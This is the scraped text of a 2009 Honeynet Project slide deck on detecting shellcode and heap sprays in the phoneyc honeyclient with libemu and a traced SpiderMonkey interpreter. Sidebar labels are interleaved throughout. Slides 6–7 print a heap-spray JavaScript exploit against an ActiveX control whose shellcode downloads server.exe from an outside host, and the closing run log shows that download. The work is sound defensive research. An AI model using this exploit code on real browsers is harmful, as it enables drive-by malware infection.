TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
Shellcode and heapspray detection in phoneyc
1. phoneyc with
libemu
Z. Chen
phoneyc
WB Malware .
.
Libemu Shellcode and heapspray detection in phoneyc
Tracing JS .
.. .
.
Basic Principles
SCDetection
Basic Idea
Details
Zhijie Chen1
Source Files
Implementation
1 Honeynet Project Chinese Chapter
HS Detection
Current
Results
Honeynet Project on Google Summer of Code, 2009
JoYAN . . . . . .
2. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
2
3. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
3
4. Introduction to phoneyc
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS http://code.google.com/p/phoneyc/
Basic Principles
SCDetection
A python honeyclient
Basic Idea
Details Original written by Jose Nazario.
Source Files
Implementation To detect Web-based Malware
HS Detection
Current
Results
JoYAN 4
5. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
5
6. A Typical Heapspray Mal-javascript I
phoneyc with
libemu
1 <body>
Z. Chen
<script>window.onerror=function(){return true;}</script>
phoneyc
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
style=’display:none’ id=’target’></object>
WB Malware
<SCRIPT language="javascript">
Libemu
6 var shellcode = unescape("%u9090"+"%u9090"+
Tracing JS ...(shellcode)
Basic Principles
"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672
SCDetection
Basic Idea %u7265%u652e%u6578%u0000");
Details </script>
Source Files
Implementation <SCRIPT language="javascript">
HS Detection 11 var bigblock = unescape("%u9090%u9090");
Current var headersize = 20;
Results var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
16 block = bigblock.substring(0, bigblock.length−slackspace);
while(block.length+slackspace<0x40000)
JoYAN
block = block+block+fillblock;
6
7. A Typical Heapspray Mal-javascript II
phoneyc with
libemu memory = new Array();
Z. Chen
for (x=0; x<100; x++) memory[x] = block +shellcode;
21 var buffer = ’’;
phoneyc while (buffer.length < 1024) buffer+="x05";
WB Malware var ok="1111";
Libemu target.Register(ok,buffer);
Tracing JS
</script>
Basic Principles 26 </body>
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 7
8. Heap Status After Heapspray
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
| More than ??MB 0x90(NOP)s or some other x86 instructions
SCDetection
Basic Idea as a sledge | Shellcode |
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 8
9. Detecting Shellcode/Heapspray
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
SC/HS Detecting Tool: How To Detect It?
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 9
10. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
10
11. Introduction to libemu
phoneyc with
libemu
Z. Chen
.
phoneyc From it’s official site: .
WB Malware
..
libemu is a small library written in c offering basic x86
Libemu
emulation and shellcode detection using GetPC heuristics.
Tracing JS
Basic Principles Using libemu one can:
SCDetection
Basic Idea
detect shellcodes
Details
Source Files execute the shellcodes
Implementation
HS Detection . profile shellcode behaviour
.. .
.
Current
Results Using libemu to detect shellcode and heapspray in web-based
malware: ¡¡Defending browsers against drive-by downloads:
Mitigating heap-spraying code injection attacks¿¿)
JoYAN 11
12. Detecting x86 Instructions
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
SC/HS Detecting Time: When To Detect It?
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 12
13. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
13
14. Introduction to spidermonkey
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
.
Tracing JS What is SpiderMonkey? .
Basic Principles ..
SCDetection
SpiderMonkey is the code-name for the Mozilla’s C
Basic Idea
Details
implementation of
Source Files
Implementation
JavaScript.(http://www.mozilla.org/js/spidermonkey/)
.
.. .
.
HS Detection
Current
Results
JoYAN 14
15. Basic Principles of Spidermonkey
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
All the javascript sources are compiled into js bytecodes.
Tracing JS
Basic Principles There is an interpreter who interprets the bytecodes and
SCDetection
Basic Idea
do certain simple actions.
Details
Source Files All the javascript variables are stored as jsval.
Implementation
HS Detection Some of the values are store as an “atom”, such as strings.
Current
Results
JoYAN 15
16. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
16
17. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
As both the shellcode manipulation and the spraying of the
Basic Principles fillblock involve assignments. The shellcode will be detected
SCDetection
Basic Idea
immediately on it’s assignment if we are able to interrupt
Details
Source Files
spidermonkey at the interpretion of certain bytecodes related to
Implementation an assignment and check its argments and values for shellcodes.
HS Detection
Current
Results
JoYAN 17
18. Details I
phoneyc with
libemu
Z. Chen
The following js codes:
phoneyc
function a(){b="c"; var a = 0;}
WB Malware
Libemu are compiled into bytecodes like:
Tracing JS
Basic Principles
00000: bindname "b"
SCDetection 00003: string "c"
Basic Idea 00006: setname "b"
Details
Source Files 4 00009: pop
Implementation 00010: zero
HS Detection 00011: setvar 0
Current 00014: pop
Results
00015: stop
So, if we examine the set* opcodes’ arguments on the top of
the stack in runtime, shellcodes won’t get passed!
JoYAN 18
19. Details
phoneyc with
libemu
Z. Chen
phoneyc
To do so, we need to:
WB Malware
Libemu Step trace the spidermonkey runtime.
Tracing JS Stop at the key bytecodes (such as setname, setvar,
Basic Principles
SCDetection
setprop, setarg etc.) on all kinds of
Basic Idea
Details
assignments.Unfortunately different assignments have
Source Files
Implementation
different bytecode accordingly.
HS Detection But all the opcodes related to assignments share a
Current JOF SET bit in their opcode description
Results
structure(./src/jsopcode.h).
JoYAN 19
20. Related Source files to be used later
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
jsapi.h:Basic APIs for javascript execution.
Tracing JS
Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey.
SCDetection
Basic Idea jsopcode.tbl:All the js opcodes(bytecodes).
Details
Source Files
Implementation
jsinterp.c:You can find how each bytecode is interpreted
HS Detection here.
Current
Results
JoYAN 20
21. Implementation
phoneyc with
libemu
Z. Chen Register a trace handler into spidermonkey using
phoneyc
JS SetInterrupt. This handler will be called at each step
WB Malware
of the bytecode execution.
Libemu In the handler:
Tracing JS Use JS GetTrapOpcode to get current
Basic Principles
opcode(bytecode).
SCDetection
Basic Idea
Use JS FrameIterator to get current runtime stack.
Details Check the rvalue of the set* bytecodes on the top of the
Source Files
Implementation stack with libemu.
HS Detection Dump the shellcodes and alert.
Current Contine the execution.
Results
Privide this traced js virtual as a python module named
honeyjs, so other part of phoneyc can use this module just
the same as python-spidermonkey with optional awareness
of the extra shellcode/heapspray detection APIs.
JoYAN 21
22. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
22
23. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu .
Tracing JS Heapspray .
Basic Principles
..
A myriad of NOP-like x86 instructions
SCDetection
Basic Idea
Details
Accumulating through a loop of assignments
Source Files
Implementation . Shellcode in the end of each sledge
.. .
.
HS Detection
Current
Results
JoYAN 23
24. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc .
Heapspray .
WB Malware ..
Libemu
A myriad of NOP-like x86 instructions
Tracing JS Accumulating through a loop of assignments
Basic Principles
SCDetection . Shellcode in the end of each sledge
.. .
.
Basic Idea
Details
Source Files
.
Implementation Detection .
..
HS Detection Now: A variable counter to record the mal-assignments
Current
Results
(assignments containing shellcode in the r-value).
. In the future: entropy ? the nozzle way?
.. .
.
JoYAN 24
25. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
25
26. A Run on ssreader 0day.html I
phoneyc with
libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh
Z. Chen 2 HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader 0day.html
phoneyc
[]
WB Malware
==> http://172.31.25.227/phoneyc/ssreader 0day.html
Libemu JS EVAL
Tracing JS 7 Executing Javascript:
Basic Principles
DEBUG: !!!SC DETECTED at 141847268=141847572size:374
SCDetection
DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
Basic Idea
Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
Source Files
Implementation
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
HS Detection 12
...
Current
Results
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
SSReader Pdg2 Register method overflow
17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1
Runing shellcode... offset:248
JoYAN
DEBUG: Begin analyzing ...
DEBUG: download http://1v1.name/server.exe −>
26
27. A Run on ssreader 0day.html II
phoneyc with
libemu
Z. Chen
c:WINDOWSsystem32a.exe
phoneyc
22
WB Malware ...
Libemu
Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server.
Basic Principles exe’]
SCDetection Done
Basic Idea
Details
27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1
Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT:
Implementation
100
HS Detection
VBS EVAL IFRAMES []
Current
Results
HREFS []
FRAMES []
32 IMAGES []
JoYAN 27